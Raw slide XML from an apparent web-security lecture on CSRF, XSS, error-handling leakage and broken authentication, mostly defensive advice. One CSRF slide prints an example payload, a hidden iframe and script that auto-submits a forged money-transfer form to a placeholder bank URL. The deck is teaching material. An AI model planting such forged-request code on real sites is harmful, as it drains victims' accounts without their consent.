              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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153400" cy="5562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sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>CSRF can be as powerful as the web application that it attacks. Takes advantage of logged on session to submit malicious transactions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>User logged on online banking in one browser session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>User browses a malicious site in a different window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The malicious site contains an invisible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>iFrame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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 smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>myframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>" style="width:0px;height:0px;border:0px"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="Courier New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 smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>		with the following script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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>"&gt;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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>  function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>fillframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>() {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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    mf = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>window.frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>myframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>”]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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    html = '&lt;form name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>getrichform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>"      </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>         action="https://secure.mybank.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>transfermoney.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>" method="post"&gt;';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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    html = html + ' &lt;input type="hidden" name=”amount" value="all"/&gt;';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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    html = html + ' &lt;input type="hidden" name="to" value="my friend bob"/&gt;';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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    html = html + ' &lt;input type="hidden" name="when" value="right now"/&gt;';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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    html = html + '&lt;/form&gt;’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="Courier New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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>mf.document.body.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> = html;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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>mf.document.getrichform.submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>();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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    }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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"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charset="-128"/>
              </a:rPr>
              <a:t>XSS vs. CSRF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en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>XSS exploits the trust of a client to a server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>i.e. the client trusts contents from the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>CSRF exploits the trust of a server to a client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>i.e. the transaction is initiated by the authenticated client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>CSRF can be launched independent of XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>it can be launched using XSS as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Prevention for CSRF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 wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Ensure that there are no XSS vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Insert custom random tokens into every form and URL that will not be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> automatically submitted by the browser. For example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;form action=“/transfer.do” method=“post”&gt;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Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	  &lt;input type=“hidden” name =“9u09i0i” value=“58p9lkdfjlk”&gt;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Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	  … 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Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>   &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Verify the submitted token is valid for the current user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>For sensitive data or value transaction, re-authenticate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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>6. Information Leakage and Improper Error Handling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057400"/>
            <a:ext cx="8382000" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attackers use this weakness to steal sensitive data, or conduct more serious attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Error messages: “invalid user” and “wrong password” may give away valid user names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Better message: “invalid user name or password”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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>6. Information Leakage and Improper Error Handling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763000" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Ensure that the entire software development team shares a common approach to exception handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Disable or limit detailed error messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Scrub comments/error messages for development before final release</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Ensure that secure paths have multiple outcomes return similar or identical error messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Aware that common frameworks return different HTTP error codes depending on if the error is within your custom code or within the framework code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Overwrite default error handler. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>This reduces an automated scanner’s ability to detect situations where a serious error has occurred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Managing conflicting objectives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Different mind set for secure application development vs. traditional software development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Competing interest for help desk needs (more specific error message) vs. security considerations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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2867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altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>7. Broken Authentication and Session Management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686800" cy="5405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 smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Account credentials and session tokens are often not properly protected.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 smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Examples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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Allowing user to access parts of the application without the appropriate privilege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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Viewing unauthorized content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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Authorization loopholes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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>External facing administrative interfaces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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Weaknesses are more often introduced through ancillary authentication functions such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>logout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>password management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>timeout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>remember me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>secret question</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>account update</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
